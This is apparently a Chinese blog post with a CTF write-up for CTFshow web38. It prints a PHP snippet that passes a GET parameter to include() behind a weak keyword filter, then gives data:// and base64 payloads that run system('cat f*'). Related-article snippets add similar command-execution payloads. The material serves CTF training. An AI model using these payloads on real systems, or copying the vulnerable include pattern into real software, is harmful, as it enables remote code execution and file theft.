CTFshow 命令执行 web38

最新推荐文章于 2024-04-01 17:45:22 发布
最新推荐文章于 2024-04-01 17:45:22 发布
阅读量178 收藏
点赞数
分类专栏: CTFshow 文章标签: 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kracxi/article/details/121040761
版权

源码

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-04 00:12:34
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-04 05:23:36
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|php|file/i", $c)){
        include($c);
        echo $flag;
    
    }
        
}else{
    highlight_file(__FILE__);
}

发现过滤了php和file,php和file伪协议都不能用了,继续用data伪协议
?c=data://text/plain,<?php system("cat f*")?>
发现什么都没有显示, 原因是php被过滤,使用base64编码就好了
?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCJjYXQgZioiKTs/PiA=

Kradress
关注
专栏目录
CTFshow 命令执行 web57
Kradress的博客
11-20 455
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-08 01:02:56 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ // 还能炫的动吗? //flag in 36.php if
CTFshow 命令执行 web51
Kradress的博客
11-20 366
目录源码知识点题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-05 22:42:52 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['c'])){
ctfshow-web38(命令执行)
m0_62094846的博客
01-22 427
<?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 05:23:36 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ //flag in flag.php error_reporting(0); if(i..
ctfshow-命令执行-web38
weixin_43400535的博客
11-03 3443
ctfshow-web38 文章目录ctfshow-web38题目描述:原理:审计:方法:思路:同web38利用data为协议Flag: 题目描述: 原理: 审计: <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-04 00:12:34 # @Last Modified by: h1xa # @Last Modified time: 2020-09-04 05:23:36 # @email: h1x
Ctfshow web入门-web38 WP
qq_45427131的博客
05-18 349
查看源代码发现对比上一题只是多了对php的过滤,对php的过滤影响到的是data协议rce时<?php语句的构造 不过<?php system(‘ls’);?>是可以简写将php省略的 <?php system(‘ls’);> 等于 <?=system(‘ls’);?> 这是作者的一个小实验: 构造payload http://f5d8e458-5d09-4ed5-aba4-98ddda953a5b.challenge.ctf.show:8080/?c=data
ctfshow学习记录-web入门(命令执行29-38)
龟速更新的九某人
06-02 934
ctfshow学习记录-web入门(web29-38)
ctfshow web入门 命令执行34-38
m0_62207170的博客
03-25 537
ctfshow web入门 命令执行34-38
CTFshow 命令执行 web65
Kradress的博客
12-03 161
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-07 22:02:47 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ // 你们在炫技吗? if(isset($_POST
CTFshow 命令执行 web75
Kradress的博客
12-06 1246
目录源码思路题解总结 源码 Warning: error_reporting() has been disabled for security reasons in /var/www/html/index.php on line 14 Warning: ini_set() has been disabled for security reasons in /var/www/html/index.php on line 15 Warning: highlight_file() has been dis
CTFshow 命令执行 web73
Kradress的博客
12-06 409
目录源码思路题解总结 源码 Warning: error_reporting() has been disabled for security reasons in /var/www/html/index.php on line 14 Warning: ini_set() has been disabled for security reasons in /var/www/html/index.php on line 15 Warning: highlight_file() has been dis
ctfshow-web入门-命令执行-web38,web39
HkD01L的博客
06-25 778
ctfshow,命令执行web38,web39
ctfshow web入门 web29-web38
最新发布
2301_81040377的博客
04-01 682
一样的做法,一个不用的步骤都没有,中途操作有问题的评论或者私聊帮你解决。但是我的payload根本就没有数字哇,继续用,都已经是套娃了家人们。到手,之前做过日志文件包含所以我看到自己的题解找到的这个"说实话不认真比对真的看不出来有啥区别,这次多了一个等号。没有意外把这个system屏蔽了没事我不用哈哈哈。这里放两张我和大佬聊天的截图,真的很无语。双引号屏蔽了我不用就是了把刚才那个改一下。但是我抱着试一试的情况把他做出来了。php伪协议,最常用的两种命令。user agent传马。某位大佬的题解看到的。
ctfshow-web29~38做题记录
akxnxbshai的博客
01-13 212
Web 29 题目过滤了flag,所以利用通配符来执行命令。 Payload:?c=system('tac f*'); Web 30 查看源代码 System函数不能用,可以用passthru、exec,shell_exec等函数,exec不能输出结果。 特别说一下用exec时构造?c=exec(‘cp f* 1.txt’);(将flag.php中的内容复制给1.txt) 访问1.txt,拿到flag。 Web 31 过滤条件: flag\system\php\cat\
CTFshow web37 38 39 40
ChenD的学习笔记
11-08 922
CTFshow web37 web38 web39 web40
ctfshow-web830
lastwinn的博客
07-01 279
记录自己的所学以及理解。
1.30 刷题
Lumos427的博客
01-30 763
ctfshow web入门 命令执行 web37 //flag in flag.php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ include($c); echo $flag; } }else{ highlight_file(__FILE__); } 这里用了include文件包含,代码不能直接执行
ctfshow web入门命令执行部分(更新至56)
L1ni01
10-16 3598
ctfshow web 入门 命令执行部分 web29 源码 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } payload:c=system('cat f*'); 匹配任何字符串/文本,包括空字符串;
CTFshow——命令执行
lee_maple的博客
04-23 5668
CTFshow——命令执行 Web29 <?php error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 可以看到,flag已经被过滤掉,先查看目录 我们可以使用通配符绕过flag的过滤 Web30 <?php
CTFshow_命令执行
qq_45927819的博客
11-20 1313
文章目录web29 web29 error_reporting(0); if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } 过滤了flag get方式传参: ?c=system(ls); 发现flag.php 直接查看就行: ?c=system('cat ')
ctfshow web入门命令执行
09-05
在CTF中,web入门命令执行指的是通过Web应用程序的漏洞,将恶意的命令注入到应用程序中并执行。这样的攻击可以导致未经授权的访问和操纵应用程序的数据和功能。 根据引用中提供的信息,可以看到一些常见的双写绕过...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值